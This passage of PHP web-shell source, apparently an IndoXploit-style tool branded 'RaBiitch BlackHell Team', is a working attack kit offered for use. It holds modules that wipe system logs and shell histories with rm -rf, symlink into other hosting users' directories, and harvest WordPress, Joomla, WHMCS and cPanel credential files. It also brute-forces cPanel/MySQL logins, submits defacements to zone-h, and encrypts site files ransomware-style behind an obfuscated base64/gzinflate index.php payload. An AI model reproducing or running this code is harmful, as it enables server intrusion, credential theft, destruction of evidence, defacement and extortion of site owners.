  3101.     shell_exec("rm -rf /usr/local/apache/log");
  3102.     shell_exec("rm -rf /var/apache/logs");
  3103.     shell_exec("rm -rf /var/apache/log");
  3104.     shell_exec("rm -rf /var/run/utmp");
  3105.     shell_exec("rm -rf /var/logs");
  3106.     shell_exec("rm -rf /var/log");
  3107.     shell_exec("rm -rf /var/adm");
  3108.     shell_exec("rm -rf /etc/wtmp");
  3109.     shell_exec("rm -rf /etc/utmp");
  3110.     shell_exec("rm -rf $HISTFILE");
  3111.     shell_exec("rm -rf /var/log/lastlog");
  3112.     shell_exec("rm -rf /var/log/wtmp");
  3113.  
  3114.     passthru("rm -rf /tmp/logs");
  3115.     passthru("rm -rf /root/.ksh_history");
  3116.     passthru("rm -rf /root/.bash_history");
  3117.     passthru("rm -rf /root/.bash_logout");
  3118.     passthru("rm -rf /usr/local/apache/logs");
  3119.     passthru("rm -rf /usr/local/apache/log");
  3120.     passthru("rm -rf /var/apache/logs");
  3121.     passthru("rm -rf /var/apache/log");
  3122.     passthru("rm -rf /var/run/utmp");
  3123.     passthru("rm -rf /var/logs");
  3124.     passthru("rm -rf /var/log");
  3125.     passthru("rm -rf /var/adm");
  3126.     passthru("rm -rf /etc/wtmp");
  3127.     passthru("rm -rf /etc/utmp");
  3128.     passthru("rm -rf $HISTFILE");
  3129.     passthru("rm -rf /var/log/lastlog");
  3130.     passthru("rm -rf /var/log/wtmp");
  3131.  
  3132.  
  3133.     system("rm -rf /tmp/logs");
  3134.     sleep(2);
  3135.     echo'<br>Sudah Terpasang Pengaman .../tmp/logs ';
  3136.     sleep(2);
  3137.  
  3138.     system("rm -rf /root/.bash_history");
  3139.     sleep(2);
  3140.     echo'<p>Sudah Terpasang Pengaman .../root/.bash_history </p>';
  3141.  
  3142.     system("rm -rf /root/.ksh_history");
  3143.     sleep(2);
  3144.     echo'<p>Sudah Terpasang Pengaman .../root/.ksh_history </p>';
  3145.  
  3146.     system("rm -rf /root/.bash_logout");
  3147.     sleep(2);
  3148.     echo'<p>Sudah Terpasang Pengaman .../root/.bash_logout </p>';
  3149.  
  3150.     system("rm -rf /usr/local/apache/logs");
  3151.     sleep(2);
  3152.     echo'<p>Sudah Terpasang Pengaman .../usr/local/apache/logs </p>';
  3153.  
  3154.     system("rm -rf /usr/local/apache/log");
  3155.     sleep(2);
  3156.     echo'<p>Sudah Terpasang Pengaman .../usr/local/apache/log </p>';
  3157.  
  3158.     system("rm -rf /var/apache/logs");
  3159.     sleep(2);
  3160.     echo'<p>Sudah Terpasang Pengaman .../var/apache/logs </p>';
  3161.  
  3162.     system("rm -rf /var/apache/log");
  3163.     sleep(2);
  3164.     echo'<p>Sudah Terpasang Pengaman .../var/apache/log </p>';
  3165.  
  3166.     system("rm -rf /var/run/utmp");
  3167.     sleep(2);
  3168.     echo'<p>Sudah Terpasang Pengaman .../var/run/utmp </p>';
  3169.  
  3170.     system("rm -rf /var/logs");
  3171.     sleep(2);
  3172.     echo'<p>Sudah Terpasang Pengaman .../var/logs </p>';
  3173.  
  3174.     system("rm -rf /var/log");
  3175.     sleep(2);
  3176.     echo'<p>Sudah Terpasang Pengaman .../var/log </p>';
  3177.  
  3178.     system("rm -rf /var/adm");
  3179.     sleep(2);
  3180.     echo'<p>Sudah Terpasang Pengaman .../var/adm </p>';
  3181.  
  3182.     system("rm -rf /etc/wtmp");
  3183.     sleep(2);
  3184.     echo'<p>Sudah Terpasang Pengaman .../etc/wtmp </p>';
  3185.  
  3186.     system("rm -rf /etc/utmp");
  3187.     sleep(2);
  3188.     echo'<p>Sudah Terpasang Pengaman .../etc/utmp </p>';
  3189.  
  3190.     system("rm -rf $HISTFILE");
  3191.     sleep(2);
  3192.     echo'<p>Sudah Terpasang Pengaman ...$HISTFILE </p>';
  3193.  
  3194.     system("rm -rf /var/log/lastlog");
  3195.     sleep(2);
  3196.     echo'<p>Sudah Terpasang Pengaman .../var/log/lastlog </p>';
  3197.  
  3198.     system("rm -rf /var/log/wtmp");
  3199.     sleep(2);
  3200.     echo'<p>Sudah Terpasang Pengaman .../var/log/wtmp </p>';
  3201.  
  3202.     sleep(4);
  3203.  
  3204.     echo '<br><br><p>Sukses Masang Pengamannya ... Bebas Di Server';
  3205.     echo"</td></tr></table>";
  3206. }
  3207. elseif($_GET['RaBiitch'] == 'symlink') {
  3208. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $path);
  3209. $d0mains = @file("/etc/named.conf");
  3210. ##httaces
  3211. if($d0mains){
  3212. @mkdir("RaBiitch_sym",0777);
  3213. @chdir("RaBiitch_sym");
  3214. @exe("ln -s / c7e");
  3215. $file3 = 'Options Indexes FollowSymLinks
  3216. DirectoryIndex c7e.htm
  3217. AddType text/plain .php
  3218. AddHandler text/plain .php
  3219. Satisfy Any';
  3220. $fp3 = fopen('.htaccess','w');
  3221. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  3222. echo "
  3223. <table align=center border=1 style='width:60%;border-color:#000000;'>
  3224. <tr>
  3225. <td align=center><font size=2>S. No.</font></td>
  3226. <td align=center><font size=2>Domains</font></td>
  3227. <td align=center><font size=2>Users</font></td>
  3228. <td align=center><font size=2>Symlink</font></td>
  3229. </tr>";
  3230. $dcount = 1;
  3231. foreach($d0mains as $d0main){
  3232. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  3233. flush();
  3234. if(strlen(trim($domains[1][0])) > 2){
  3235. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  3236. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  3237. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  3238. <td>".$user['name']."</td>
  3239. <td><a href='RaBiitch_sym/c7e/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  3240. flush();
  3241. $dcount++;}}}
  3242. echo "</table>";
  3243. }else{
  3244. $TEST=@file('/etc/passwd');
  3245. if ($TEST){
  3246. @mkdir("RaBiitch_sym",0777);
  3247. @chdir("RaBiitch_sym");
  3248. exe("ln -s / c7e");
  3249. $file3 = 'Options Indexes FollowSymLinks
  3250. DirectoryIndex c7e.htm
  3251. AddType text/plain .php
  3252. AddHandler text/plain .php
  3253. Satisfy Any';
  3254.  $fp3 = fopen('.htaccess','w');
  3255.  $fw3 = fwrite($fp3,$file3);
  3256.  @fclose($fp3);
  3257.  echo "
  3258. <table align=center border=1><tr>
  3259. <td align=center><font size=3>S. No.</font></td>
  3260. <td align=center><font size=3>Users</font></td>
  3261. <td align=center><font size=3>Symlink</font></td></tr>";
  3262.  $dcount = 1;
  3263.  $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  3264.  while(!feof($file)){
  3265.  $s = fgets($file);
  3266.  $matches = array();
  3267.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  3268.  $matches = str_replace("home/","",$matches[1]);
  3269.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  3270.  continue;
  3271.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  3272. <td align=center><font class=txt>" . $matches . "</td>";
  3273.  echo "<td align=center><font class=txt><a href=RaBiitch_sym/c7e/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  3274.  $dcount++;}fclose($file);
  3275.  echo "</table>";}else{if($os != "Windows"){@mkdir("RaBiitch_sym",0777);@chdir("RaBiitch_sym");@exe("ln -s / c7e");$file3 = '
  3276. Options Indexes FollowSymLinks
  3277. DirectoryIndex c7e.htm
  3278. AddType text/plain .php
  3279. AddHandler text/plain .php
  3280. Satisfy Any
  3281. ';
  3282.  $fp3 = fopen('.htaccess','w');
  3283.  $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  3284.  echo "
  3285. <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
  3286. <table align=center border=1><tr>
  3287. <td align=center><font size=3>ID</font></td>
  3288. <td align=center><font size=3>Users</font></td>
  3289. <td align=center><font size=3>Symlink</font></td></tr>";
  3290.  $temp = "";$val1 = 0;$val2 = 1000;
  3291.  for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  3292.  if ($uid)$temp .= join(':',$uid)."\n";}
  3293.  echo '<br/>';$temp = trim($temp);$file5 =
  3294.  fopen("test.txt","w");
  3295.  fputs($file5,$temp);
  3296.  fclose($file5);$dcount = 1;$file =
  3297.  fopen("test.txt", "r") or exit("Unable to open file!");
  3298.  while(!feof($file)){$s = fgets($file);$matches = array();
  3299.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  3300.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  3301.  continue;
  3302.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  3303. <td align=center><font class=txt>" . $matches . "</td>";
  3304.  echo "<td align=center><font class=txt><a href=RaBiitch_sym/c7e/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  3305.  $dcount++;}
  3306.  fclose($file);
  3307.  echo "</table></div></center>";unlink("test.txt");
  3308.  } else
  3309.  echo "<center><font size=3>Cannot create Symlink</font></center>";
  3310.  }
  3311.  }    
  3312. }
  3313. elseif($_GET['RaBiitch'] == 'config') {
  3314.     $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
  3315.     $idx = mkdir("RaBiitch_conf", 0777);
  3316.     $isi_htc = "Options all\nRequire None\nSatisfy Any";
  3317.     $htc = fopen("RaBiitch_conf/.htaccess","w");
  3318.     fwrite($htc, $isi_htc);
  3319.     while($passwd = fgets($etc)) {
  3320.         if($passwd == "" || !$etc) {
  3321.             echo "<font color=red>Can't read /etc/passwd</font>";
  3322.         } else {
  3323.             preg_match_all('/(.*?):x:/', $passwd, $user_config);
  3324.             foreach($user_config[1] as $c7euser) {
  3325.                 $user_config_dir = "/home/$c7euser/public_html/";
  3326.                 if(is_readable($user_config_dir)) {
  3327.                     $grab_config = array(
  3328.                         "/home/$c7euser/.my.cnf" => "cpanel",
  3329.                         "/home/$c7euser/.accesshash" => "WHM-accesshash",
  3330.                         "/home/$c7euser/public_html/po-content/config.php" => "Popoji",
  3331.                         "/home/$c7euser/public_html/vdo_config.php" => "Voodoo",
  3332.                         "/home/$c7euser/public_html/bw-configs/config.ini" => "BosWeb",
  3333.                         "/home/$c7euser/public_html/config/koneksi.php" => "Lokomedia",
  3334.                         "/home/$c7euser/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  3335.                         "/home/$c7euser/public_html/clientarea/configuration.php" => "WHMCS",
  3336.                         "/home/$c7euser/public_html/whm/configuration.php" => "WHMCS",
  3337.                         "/home/$c7euser/public_html/whmcs/configuration.php" => "WHMCS",
  3338.                         "/home/$c7euser/public_html/forum/config.php" => "phpBB",
  3339.                         "/home/$c7euser/public_html/sites/default/settings.php" => "Drupal",
  3340.                         "/home/$c7euser/public_html/config/settings.inc.php" => "PrestaShop",
  3341.                         "/home/$c7euser/public_html/app/etc/local.xml" => "Magento",
  3342.                         "/home/$c7euser/public_html/joomla/configuration.php" => "Joomla",
  3343.                         "/home/$c7euser/public_html/configuration.php" => "Joomla",
  3344.                         "/home/$c7euser/public_html/wp/wp-config.php" => "WordPress",
  3345.                         "/home/$c7euser/public_html/wordpress/wp-config.php" => "WordPress",
  3346.                         "/home/$c7euser/public_html/wp-config.php" => "WordPress",
  3347.                         "/home/$c7euser/public_html/admin/config.php" => "OpenCart",
  3348.                         "/home/$c7euser/public_html/slconfig.php" => "Sitelok",
  3349.                         "/home/$c7euser/public_html/application/config/database.php" => "Ellislab");
  3350.                     foreach($grab_config as $config => $nama_config) {
  3351.                         $ambil_config = file_get_contents($config);
  3352.                         if($ambil_config == '') {
  3353.                         } else {
  3354.                             $file_config = fopen("RaBiitch_conf/$c7euser-$nama_config.txt","w");
  3355.                             fputs($file_config,$ambil_config);
  3356.                         }
  3357.                     }
  3358.                 }      
  3359.             }
  3360.         }  
  3361.     }
  3362.     echo "<br><center><a href='?path=$path/RaBiitch_conf'><font>Done</font></a></center>";
  3363. }elseif($_GET['RaBiitch'] == 'adminer') {
  3364.     $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $path);
  3365.     function adminer($url, $isi) {
  3366.         $fp = fopen($isi, "w");
  3367.         $ch = curl_init();
  3368.               curl_setopt($ch, CURLOPT_URL, $url);
  3369.               curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  3370.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  3371.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  3372.               curl_setopt($ch, CURLOPT_FILE, $fp);
  3373.         return curl_exec($ch);
  3374.               curl_close($ch);
  3375.         fclose($fp);
  3376.         ob_flush();
  3377.         flush();
  3378.     }
  3379.     if(file_exists('adminer.php')) {
  3380.         echo "<center><font><a href='$full/adminer.php' target='_blank'>-> Adminer <-</a></font></center>";
  3381.     } else {
  3382.         if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  3383.             echo "<center><font><a href='$full/adminer.php' target='_blank'>-> Adminer <-</a></font></center>";
  3384.         } else {
  3385.             echo "<center><font color=red>gagal buat file adminer</font></center>";
  3386.         }
  3387.     }
  3388. }elseif($_GET['RaBiitch'] == 'crkcp') {
  3389. echo '<center>';
  3390.     if($_POST['crack']) {
  3391.         $usercp = explode("\r\n", $_POST['user_cp']);
  3392.         $passcp = explode("\r\n", $_POST['pass_cp']);
  3393.         $i = 0;
  3394.         foreach($usercp as $ucp) {
  3395.             foreach($passcp as $pcp) {
  3396.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
  3397.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  3398.                     } else {
  3399.                         $_SESSION[$ucp] = "1";
  3400.                         $_SESSION[$pcp] = "1";
  3401.                         if($ucp == '' || $pcp == '') {
  3402.                            
  3403.                         } else {
  3404.                             $i++;
  3405.                             if(function_exists('posix_getpwuid')) {
  3406.                                 $domain_cp = file_get_contents("/etc/named.conf"); 
  3407.                                 if($domain_cp == '') {
  3408.                                     $dom =  "<font color=red>gabisa ambil nama domain nya</font>";
  3409.                                 } else {
  3410.                                     preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  3411.                                     foreach($domains_cp[1] as $dj) {
  3412.                                         $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  3413.                                         $user_cp_url = $user_cp_url['name'];
  3414.                                         if($user_cp_url == $ucp) {
  3415.                                             $dom = "<a href='http://$dj/' target='_blank'><font color=green>$dj</font></a>";
  3416.                                             break;
  3417.                                         }
  3418.                                     }
  3419.                                 }
  3420.                             } else {
  3421.                                 $dom = "<font color=red>function is Disable by system</font>";
  3422.                             }
  3423.                             echo "username (<font color=green>$ucp</font>) password (<font color=green>$pcp</font>) domain ($dom)<br>";
  3424.                         }
  3425.                     }
  3426.                 }
  3427.             }
  3428.         }
  3429.         if($i == 0) {
  3430.         } else {
  3431.             echo "<br>sukses nyolong ".$i." Cpanel by <font color=green>IndoXploit.</font>";
  3432.         }
  3433.     } else {
  3434.         echo "<center>
  3435.         <form method='post'>
  3436.         USER: <br>
  3437.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  3438.         $_usercp = fopen("/etc/passwd","r");
  3439.         while($getu = fgets($_usercp)) {
  3440.             if($getu == '' || !$_usercp) {
  3441.                 echo "<font color=red>Can't read /etc/passwd</font>";
  3442.             } else {
  3443.                 preg_match_all("/(.*?):x:/", $getu, $u);
  3444.                 foreach($u[1] as $user_cp) {
  3445.                         if(is_dir("/home/$user_cp/public_html")) {
  3446.                             echo "$user_cp\n";
  3447.                     }
  3448.                 }
  3449.             }
  3450.         }
  3451.         echo "</textarea><br>
  3452.         PASS: <br>
  3453.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  3454.         function cp_pass($path) {
  3455.             $pass = "";
  3456.             $patha = scandir($path);
  3457.             foreach($patha as $pathb) {
  3458.                 if(!is_file("$path/$pathb")) continue;
  3459.                 $ambil = file_get_contents("$path/$path");
  3460.                 if(preg_match("/WordPress/", $ambil)) {
  3461.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  3462.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  3463.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
  3464.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  3465.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  3466.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  3467.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
  3468.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  3469.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  3470.                 } elseif(preg_match("/^[client]$/", $ambil)) {
  3471.                     preg_match("/password=(.*?)/", $ambil, $pass1);
  3472.                     if(preg_match('/"/', $pass1[1])) {
  3473.                         $pass1[1] = str_replace('"', "", $pass1[1]);
  3474.                         $pass .= $pass1[1]."\n";
  3475.                     } else {
  3476.                         $pass .= $pass1[1]."\n";
  3477.                     }
  3478.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  3479.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  3480.                 }
  3481.             }
  3482.             echo $pass;
  3483.         }
  3484.         $cp_pass = cp_pass($path);
  3485.         echo $cp_pass;
  3486.         echo "</textarea><br>
  3487.         <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  3488.         </form>
  3489.         <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  3490.     }
  3491. }
  3492. elseif($_GET['RaBiitch'] == 'zoneh') {
  3493.     if($_POST['submit']) {
  3494. echo '<center>';
  3495.         $domain = explode("\r\n", $_POST['url']);
  3496.         $nick =  $_POST['nick'];
  3497.         echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  3498.         echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  3499.         function zoneh($url,$nick) {
  3500.             $ch = curl_init("http://www.zone-h.com/notify/single");
  3501.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  3502.                   curl_setopt($ch, CURLOPT_POST, true);
  3503.                   curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  3504.             return curl_exec($ch);
  3505.                   curl_close($ch);
  3506.         }
  3507.         foreach($domain as $url) {
  3508.             $zoneh = zoneh($url,$nick);
  3509.             if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  3510.                 echo "$url -> <font>OK</font><br>";
  3511.             } else {
  3512.                 echo "$url -> <font color=red>ERROR</font><br>";
  3513.             }
  3514.         }
  3515.     } else {
  3516.         echo "<center><form method='post'>
  3517.         <u>Defacer</u>: <br>
  3518.         <input type='text' name='nick' size='50' value='RaBiitch BlackHell Team'><br>
  3519.         <u>Domains</u>: <br>
  3520.         <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  3521.         <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  3522.         </form>";
  3523.     }
  3524.     echo "</center>";
  3525. }
  3526.  
  3527.  
  3528.  
  3529.  
  3530.  
  3531.  
  3532.  
  3533.  
  3534. elseif($_GET['RaBiitch'] == 'ganteng') {
  3535. echo "
  3536. <style type='text/css'>
  3537. body {
  3538.    background: #1A1C1F;
  3539.    color: #e2e2e2;
  3540. }
  3541. .inpute{
  3542.    border-style: dotted;
  3543.    border-color: #379600;
  3544.    background-color: transparent;
  3545.    color: white;
  3546.    text-align: center;
  3547. }
  3548. .selecte{
  3549.    border-style: dotted;
  3550.    border-color: green;
  3551.    background-color: transparent;
  3552.    color: green;
  3553. }
  3554. .submite{
  3555.       border-style: dotted;
  3556.    border-color: #4CAF50;
  3557.    background-color: transparent;
  3558.    color: white;
  3559. }
  3560. .result{
  3561.  text-align: left;
  3562. }
  3563. </style>
  3564. <link rel='stylesheet' type='text/css'
  3565. href='https://maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css'>
  3566. </head>
  3567. <body>
  3568. <div class='result'>";
  3569.     error_reporting(0);
  3570.     set_time_limit(0);
  3571.     ini_set('memory_limit', '-1');
  3572.     class deRanSomeware {
  3573.         public function shcpackInstall() {
  3574.             if(!file_exists(".htabak")) {
  3575.                 rename(".htaccess", ".htabak");
  3576.                 if(fwrite(fopen('.htaccess', 'w+'), "\rDirectoryIndex
  3577. index.php\r\nErrorDocument 404 /index.php")) {
  3578.                     echo '<i class="fa fa-thumbs-o-up"
  3579. aria-hidden="true"></i> .htaccess (Default
  3580. Page)<br>';
  3581.                 }
  3582.                 if(file_put_contents("index.php",
  3583. gzinflate(base64_decode("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"))))
  3584. {
  3585.                     echo '<i class="fa fa-thumbs-o-up"
  3586. aria-hidden="true"></i>  index.php (Default
  3587. Page)<br>';
  3588.                 }
  3589.             }
  3590.         }
  3591.         public function shcpackUnstall() {
  3592.             if(file_exists(".htabak")) {
  3593.                 if(unlink(".htaccess") &&
  3594. unlink("index.php")) {
  3595.                     echo '<i class="fa fa-thumbs-o-down"
  3596. aria-hidden="true"></i> .htaccess (Default
  3597. Page)<br>';
  3598.                     echo '<i class="fa fa-thumbs-o-down"
  3599. aria-hidden="true"></i> index.php (Default
  3600. Page)<br>';
  3601.                 }
  3602.                 rename(".htabak", ".htaccess");
  3603.             }
  3604.         }
  3605.         public function plus() {
  3606.             flush();
  3607.             ob_flush();
  3608.         }
  3609.         public function locate() {
  3610.             return getcwd();
  3611.         }
  3612.         public function shcdirs($dir, $method, $key) {
  3613.             switch($method) {
  3614.                 case '1':
  3615.                     deRanSomeware::shcpackInstall();
  3616.                     break;
  3617.                 case '2':
  3618.                     deRanSomeware::shcpackUnstall();
  3619.                     break;
  3620.             }
  3621.             foreach(scandir($dir) as $d) {
  3622.                 if($d != '.' && $d != '..') {
  3623.                     $locate = $dir . DIRECTORY_SEPARATOR . $d;
  3624.                     if(!is_dir($locate)) {
  3625.                         if(deRanSomeware::kecuali($locate,
  3626. "ini.php") && deRanSomeware::kecuali($locate,
  3627. ".png") && deRanSomeware::kecuali($locate,
  3628. ".htaccess") && deRanSomeware::kecuali($locate,
  3629. "ini.php") && deRanSomeware::kecuali($locate,
  3630. "index.php") && deRanSomeware::kecuali($locate,
  3631. ".htabak")) {
  3632.                             switch($method) {
  3633.                                 case '1':
  3634.                                     deRanSomeware::shcEnCry($key,
  3635. $locate);
  3636.                                     deRanSomeware::shcEnDesDirS($locate,
  3637. "1");
  3638.                                     break;
  3639.                                 case '2':
  3640.                                     deRanSomeware::shcDeCry($key,
  3641. $locate);
  3642.                                     deRanSomeware::shcEnDesDirS($locate,
  3643. "2");
  3644.                                     break;
  3645.                             }
  3646.                         }
  3647.                     } else {
  3648.                         deRanSomeware::shcdirs($locate, $method, $key);
  3649.                     }
  3650.                 }
  3651.                 deRanSomeware::plus();
  3652.             }
  3653.         }
  3654.         public function shcEnDesDirS($locate, $method) {
  3655.             switch($method) {
  3656.                 case '1':
  3657.                     rename($locate, $locate . ".bak");
  3658.                     break;
  3659.                 case '2':
  3660.                     $locates = str_replace(".bak", "",
  3661. $locate);
  3662.                     rename($locate, $locates);
  3663.                     break;
  3664.             }
  3665.         }
  3666.         public function shcEnCry($key, $locate) {
  3667.             $data      = file_get_contents($locate);
  3668.             $iv        =
  3669. mcrypt_create_iv(mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC),
  3670. MCRYPT_DEV_URANDOM);
  3671.             $encrypted = base64_encode($iv .
  3672. mcrypt_encrypt(MCRYPT_RIJNDAEL_128, hash('sha256', $key, true), $data,
  3673. MCRYPT_MODE_CBC, $iv));
  3674.             if(file_put_contents($locate, $encrypted)) {
  3675.                 echo '<i class="fa fa-lock"
  3676. aria-hidden="true"></i> <font
  3677. color="#00BCD4">Locked</font> (<font
  3678. color="#40CE08">Success</font>) <font
  3679. color="#FF9800">|</font> <font
  3680. color="#2196F3">' . $locate . '</font> <br>';
  3681.             } else {
  3682.                 echo '<i class="fa fa-lock"
  3683. aria-hidden="true"></i> <font
  3684. color="#00BCD4">Locked</font> (<font
  3685. color="red">Failed</font>) <font
  3686. color="#FF9800">|</font> ' . $locate . ' <br>';
  3687.             }
  3688.         }
  3689.         public function shcDeCry($key, $locate) {
  3690.             $data      = base64_decode(file_get_contents($locate));
  3691.             $iv        = substr($data, 0,
  3692. mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC));
